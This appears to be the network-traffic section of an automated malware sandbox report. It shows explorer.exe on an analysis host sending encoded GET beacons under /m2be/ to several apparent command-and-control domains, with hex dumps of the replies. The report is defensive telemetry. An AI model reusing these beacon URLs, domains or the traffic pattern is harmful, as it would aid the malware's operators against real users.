                                                                                                Data Raw: 31 35 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 70 61 63 69 74 61 63 69 6f 6e 64 65 6c 66 75 74 75 72 6f 2e 63 6f 6d 2f 6d 32 62 65 2f 3f 74 38 72 3d 4a 75 47 79 74 75 77 30 49 32 43 76 73 4a 72 68 4b 50 71 78 63 53 73 2b 65 41 48 52 49 68 4d 7a 6d 67 36 6d 32 67 5a 32 53 66 2f 35 45 46 42 71 31 5a 78 7a 53 72 43 41 72 72 63 79 45 42 57 6d 75 38 36 71 26 61 6d 70 3b 31 62 59 78 54 3d 6d 54 66 70 63 64 57 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                Data Ascii: 156<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.capacitaciondelfuturo.com/m2be/?t8r=JuGytuw0I2CvsJrhKPqxcSs+eAHRIhMzmg6m2gZ2Sf/5EFBq1ZxzSrCArrcyEBWmu86q&amp;1bYxT=mTfpcdW">here</a>.</p></body></html>
Mar 22, 2021 08:56:09.084713936 CET | 1403 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49728 | 185.18.52.85 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 22, 2021 08:56:14.239460945 CET | 4516 | OUT | GET /m2be/?t8r=ym0xxX00S0Wf+ixf12QOfxKttvR95wzAnITo9bxnjEKQPe2KXbpsv5dlZ+lGmtzP6AJs&1bYxT=mTfpcdW HTTP/1.1
                                                                                                Host: www.mantequillahub.pro
                                                                                                Connection: close
                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                Data Ascii:
Mar 22, 2021 08:56:14.289760113 CET | 4518 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 22 Mar 2021 07:56:14 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 7354
                                                                                                Connection: close
                                                                                                Last-Modified: Sat, 13 Feb 2021 16:45:30 GMT
                                                                                                Accept-Ranges: bytes
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3a 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 2f 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 35 37 78 35 37 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 31 31 34 78 31 31 34 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 31 34 78 31 31 34 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 
63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 37 32 78 37 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 37 32 78 37 32 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 31 34 34 78 31 34 34 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 36 30 78 36 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 36 30 78 36 30 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30
                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <title>404: / 404: Not Found</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="format-detection" content="telephone=no"> <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE"> <link rel="apple-touch-icon-precomposed" sizes="57x57" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-57x57.png"> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon-precomposed" sizes="60x60" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-60x60.png"> <link rel="apple-touch-icon-precomposed" sizes="120x120" href="https://hostnl03.fornex.host/40
Mar 22, 2021 08:56:14.289783001 CET | 4519 | IN | Data Raw: 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 32 30 78 31 32 30 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f
                                                                                                Data Ascii: 4/img/favicon/apple-touch-icon-120x120.png"> <link rel="apple-touch-icon-precomposed" sizes="76x76" href="https://hostnl03.fornex.host/404/img/favicon/apple-touch-icon-76x76.png"> <link rel="apple-touch-icon-precomposed" sizes="152x152
                                                                                                Mar 22, 2021 08:56:14.289798975 CET4521INData Raw: 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 68 6f 73 74 6e 6c 30 33 2e 66 6f 72 6e 65 78 2e 68 6f 73 74 2f 34 30 34 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2f 6d 73 74 69 6c 65 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 6d
                                                                                                Data Ascii: content="https://hostnl03.fornex.host/404/img/favicon/mstile-150x150.png"> <meta name="msapplication-wide310x150logo" content="https://hostnl03.fornex.host/404/img/favicon/mstile-310x150.png"> <meta name="msapplication-square310x310lo
                                                                                                Mar 22, 2021 08:56:14.289814949 CET4522INData Raw: 3e d0 9d d0 b0 d0 b4 d0 b5 d0 b6 d0 bd d1 8b d0 b5 20 56 50 53 2c 20 d0 b2 d1 8b d0 b4 d0 b5 d0 bb d0 b5 d0 bd d0 bd d1 8b d0 b5 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d1 8b 2c 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b8 20 d0 b4 d0 be
                                                                                                Data Ascii: > VPS, , </div> </div> <div class="table-cell-md ta-r hdn-lg"><a href="https://fornex.com/" style="color: #fff;"><span class="border borde
                                                                                                Mar 22, 2021 08:56:14.289832115 CET4523INData Raw: 74 70 73 3a 2f 2f 66 6f 72 6e 65 78 2e 63 6f 6d 2f 68 65 6c 70 2f 63 70 61 6e 65 6c 2d 66 69 72 73 74 2d 73 74 65 70 73 2f 22 3e d0 9d d0 b0 d1 87 d0 b0 d0 bb d0 be 20 d1 80 d0 b0 d0 b1 d0 be d1 82 d1 8b 20 d1 81 20 d1 85 d0 be d1 81 d1 82 d0 b8
                                                                                                Data Ascii: tps://fornex.com/help/cpanel-first-steps/"> </a></li> <li><a href="https://fornex.com/help/transfer-site/"> </a></li> </ul>
                                                                                                Mar 22, 2021 08:56:14.289846897 CET4524INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 72 6e 65 78 2e 63 6f 6d 2f 61 6e 74 69 64 64 6f 73 2f 22 3e 41 6e 74 69 2d 44 44 6f 53 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                                                                                Data Ascii: <a href="https://fornex.com/antiddos/">Anti-DDoS</a></li> <li><a href="https://fornex.com/ssd-hosting/">SSD </a></li> </ul> </div> </div>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
5           192.168.2.5  49729        94.46.58.25     80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Mar 22, 2021 08:56:19.426618099 CET  5006                OUT        GET /m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW HTTP/1.1
    Host: www.casinoflames.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Mar 22, 2021 08:56:19.921107054 CET  5007                IN         HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Mon, 22 Mar 2021 07:56:19 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: close
    Vary: Accept-Encoding,Cookie
    Expires: Mon, 22 Mar 2021 08:56:19 GMT
    Cache-Control: max-age=3600
    X-Redirect-By: WordPress
    Location: http://casinoflames.com/m2be/?t8r=f9OOlDzSNjMkS+voKVj3JAm/FZou7FefMRO/dCbPYFE5jWEAY4Ie1mxxbA2c8ASh8bA/&1bYxT=mTfpcdW


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
6           192.168.2.5  49730        103.48.133.159  80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Mar 22, 2021 08:56:25.619002104 CET  5008                OUT        GET /m2be/?t8r=NWfrKKCiNqgfEu2gJcL26nowwYOKbN5UMUQLTML9o4O8a7GsheA9LuahVJ9lTMe/g8Lv&1bYxT=mTfpcdW HTTP/1.1
    Host: www.yyxingfa.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Mar 22, 2021 08:56:27.880943060 CET  5010                IN         HTTP/1.1 200 OK
    Date: Mon, 22 Mar 2021 07:56:25 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=ppfn15fn958k0hpsuoll01fhm2; path=/
    Upgrade: h2
    Connection: Upgrade, close
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=gbk
                                                                                                Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 21 2d 2d 20 73 61 76 65 64 20 66 72 6f 6d 20 75 72 6c 3d 28 30 30 33 34 29 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 74 6f 75 79 6f 75 62 65 6e 67 2e 63 6f 6d 2f 65 72 74 65 72 74 20 2d 2d 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 6b 22 3e 3c 74 69 74 6c 65 3e c4 fa b7 c3 ce ca b5 c4 d2 b3 c3 e6 d2 d1 be ad b8 fc c3 fb bb f2 c7 a8 d2 c6 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 20 75 72 6c 3d 2f 64 65 66 61 75 6c 74 2e 68 74 6d 6c 22 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4d 53 48 54 4d 4c 20 36 2e 30 30 2e 32 39 30 30 2e 33 36 34 30 22 20 6e 61 6d 65 3d 22 47 45 4e 45 52 41 54 4f 52 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 21 2d 2d 0a 2e 53 54 59 4c 45 31 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 2e 53 54 59 4c 45 36 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 7d 0a 2e 53 54 59 4c 45 37 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 7d 0a 2e 53 54 59 4c 45 38 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 7d 0a 2d 2d 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 6f 62 6a 20 3d 20 6a 51 75 65 72 79 2e 70 61 72 73 65 4a 53 4f 4e 28 64 69 73 6b 2e 75 74 69 6c 2e 56 69 65 
77 53 68 61 72 65 55 74 69 6c 73 2e 76 69 65 77 53 68 61 72 65 44 61 74 61 29 3b 24 28 22 64 69 76 2e 62 6f 74 74 6f 6d 42 74 6e 42 61 72 2c 68 65 61 64 65 72 2e 73 6c 69 64 65 2d 73 68 6f 77 2d 68 65 61 64 65 72 3e 73 70 61 6e 22 29 2e 61 70 70 65 6e 64 28 27 3c 61 20 74 69 74 6c 65 3d 22 4a 41 45 bf d5 bc e4 2d c7 bf c1 a6 c7 fd b6 af 22 20 63 6c 61 73 73 3d 22 6e 65 77 2d 64 62 74 6e 22 20 68 69 64 65 66 6f 63 75 73 3d 22 74 72 75 65 22 20 68 72 65 66 3d 22 2f 6d 32 62 65 2f 27 2b 6f 62 6a 2e 64 6c 69 6e 6b 2b 27 22 20 64 6f 77 6e 6c 6f 61 64 3e 3c 65 6d 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 64 6f 77 6e 6c 6f 61 64 22 3e 3c 2f 65 6d 3e 3c 62 3e d6 b1 bd d3 cf c2 d4 d8 3c 2f 62 3e 3c 2f 61 3e 27 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 20 6a 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f
                                                                                                Data Ascii: 2000<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">... saved from url=(0034)http://www.botouyoubeng.com/ertert --><html><head><meta http-equiv="Content-Type" content="text/html; charset=gbk"><title></title><meta http-equiv="Refresh" content="5; url=/default.html"><meta content="MSHTML 6.00.2900.3640" name="GENERATOR"><style type="text/css">....STYLE1 {font-size: 24px;font-weight: bold;}.STYLE6 {color: #000000;font-size: 14px;}.STYLE7 {font-size: 18px}.STYLE8 {font-size: 15px}--></style><script type="text/javascript">var obj = jQuery.parseJSON(disk.util.ViewShareUtils.viewShareData);$("div.bottomBtnBar,header.slide-show-header>span").append('<a title="JAE-" class="new-dbtn" hidefocus="true" href="/m2be/'+obj.dlink+'" download><em class="icon-download"></em><b></b></a>')</script><script type="text/javascript" src=" js.js"></script></head><bo
Mar 22, 2021 08:56:27.880964994 CET  5011                IN         Data Raw: 64 79 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 76 6c 69 6e 6b 3d 22 23 63 63 33 33 30 30 22 20 61 6c 69 6e 6b 3d 22 23 63 63 33 33 30 30 22 20 6c 69 6e 6b 3d 22 23 63 63 33 33 30 30 22 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22
    Data Ascii: dy text="#000000" vlink="#cc3300" alink="#cc3300" link="#cc3300" bgcolor="#ffffff" leftmargin="0" topmargin="0" marginheight="0" marginwidth="0"><div align="center"><table bordercolor="#dfdfdf" cellspacing="2" cellpadding="10" width="100%" b
Mar 22, 2021 08:56:27.880980968 CET  5012                IN         Data Raw: 31 36 3b 26 23 32 35 32 33 37 3b 26 23 32 37 38 38 30 3b a3 a1 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 63 6c 61 73 73 3d 22 73 39 70 22 3e
    Data Ascii: 16;&#25237;&#27880;</span></p></td></tr> <tr> <td class="s9p">&nbsp;</td> <td class="s9p"> <p></p></td></tr> <tr> <td class="s9p">&nbsp;</td> <td class="s9p">&nbsp;&nbsp;&nb
Mar 22, 2021 08:56:27.881000042 CET  5014                IN         Data Raw: 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e
    Data Ascii: static.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script><div clas
Mar 22, 2021 08:56:27.881017923 CET  5015                IN         Data Raw: 6d 65 70 72 65 22 3e 3c 70 20 69 64 3d 22 70 6c 5f 74 69 6d 65 70 22 3e 3c 73 70 61 6e 20 69 64 3d 22 70 6c 5f 63 6f 6d 6d 65 6e 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f
    Data Ascii: mepre"><p id="pl_timep"><span id="pl_comment"></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr
Mar 22, 2021 08:56:27.881082058 CET  5016                IN         Data Raw: 22 70 6c 5f 74 69 6d 65 70 22 3e 3c 73 70 61 6e 20 69 64 3d 22 70 6c 5f 63 6f 6d 6d 65 6e 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73
    Data Ascii: "pl_timep"><span id="pl_comment"></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre
Mar 22, 2021 08:56:27.881242990 CET  5018                IN         Data Raw: 70 61 6e 20 69 64 3d 22 70 6c 5f 63 6f 6d 6d 65 6e 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73 3d 22 70 6c 5f 74 69 6d 65 64 69 76 22
    Data Ascii: pan id="pl_comment"></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre id="pl_timepr
Mar 22, 2021 08:56:27.881259918 CET  5019                IN         Data Raw: 64 3d 22 70 6c 5f 63 6f 6d 6d 65 6e 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73 3d 22 70 6c 5f 74 69 6d 65 64 69 76 22 3e 3c 2f 70 72
    Data Ascii: d="pl_comment"></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre id="pl_timepre"><p
Mar 22, 2021 08:56:27.881278992 CET  5021                IN         Data Raw: 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73 3d 22 70 6c 5f 74 69 6d 65 64 69 76 22 3e 3c 2f 70 72 65 3e 3c 74 68 3e 3c 2f 74 68 3e 3c 74
    Data Ascii: "></span></p></pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre id="pl_timepre"><p id="pl_timep
Mar 22, 2021 08:56:27.882625103 CET  5022                IN         Data Raw: 3c 2f 70 72 65 3e 3c 74 64 20 69 64 3d 22 70 6c 5f 6e 72 74 64 22 3e 3c 2f 74 64 3e 3c 70 72 65 20 63 6c 61 73 73 3d 22 70 6c 5f 74 69 6d 65 64 69 76 22 3e 3c 2f 70 72 65 3e 3c 74 68 3e 3c 2f 74 68 3e 3c 74 72 20 63 6c 61 73 73 3d 22 74 69 6d 65
    Data Ascii: </pre><td id="pl_nrtd"></td><pre class="pl_timediv"></pre><th></th><tr class="timep_ff"></tr><p id="timerx"><td id="timerz"><p class="nrtdxa"><span id="pl_coment"></span></p></td></p><tr></tr><pre id="pl_timepre"><p id="pl_timep"><span id="p


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
7           192.168.2.5  49734        192.0.78.25     80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Mar 22, 2021 08:56:42.087268114 CET  5090                OUT        GET /m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW HTTP/1.1
    Host: www.michaelroberts.gallery
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Mar 22, 2021 08:56:42.128125906 CET  5091                IN         HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Mon, 22 Mar 2021 07:56:42 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: close
    Location: https://www.michaelroberts.gallery/m2be/?t8r=3hs/fdpsiUpFetMliLQ5KTd9k1PXkNk579eBvZhq6Qtrn5Lx9iP8uWKZaCpCbSQvRdph&1bYxT=mTfpcdW
    X-ac: 2.hhn _dca
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
8           192.168.2.5  49735        206.189.174.29  80                C:\Windows\explorer.exe

Timestamp                            kBytes transferred  Direction  Data
Mar 22, 2021 08:56:47.493304014 CET  5092                OUT        GET /m2be/?t8r=Nsc7yOpCpBP+OvQ//1jYzNnBC3WFsexPKF5AJOP3i6aMz/2MKahDz4LAsxw3nwyoR3zf&1bYxT=mTfpcdW HTTP/1.1
    Host: www.antiracismbyu.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Mar 22, 2021 08:56:48.593951941 CET  5092                IN         HTTP/1.1 301 Moved Permanently
    Date: Mon, 22 Mar 2021 07:56:47 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Upgrade: h2,h2c
    Connection: Upgrade, close
